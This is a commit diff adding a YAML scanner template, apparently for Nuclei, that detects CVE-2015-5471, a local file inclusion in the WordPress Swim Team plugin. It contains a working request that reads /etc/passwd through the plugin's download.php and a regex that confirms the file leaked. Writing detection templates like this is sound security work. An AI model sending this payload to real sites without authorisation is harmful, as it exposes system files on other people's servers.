Create CVE-2015-5471.yaml
parent
1c4db9df26
commit
5ad972dc6b
|
@ -0,0 +1,23 @@
|
|||
id: CVE-2015-5471
|
||||
info:
|
||||
name: Swim Team <= v1.44.10777 - Local File Inclusion
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
|
||||
tags: wordpress,plugin,wp,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue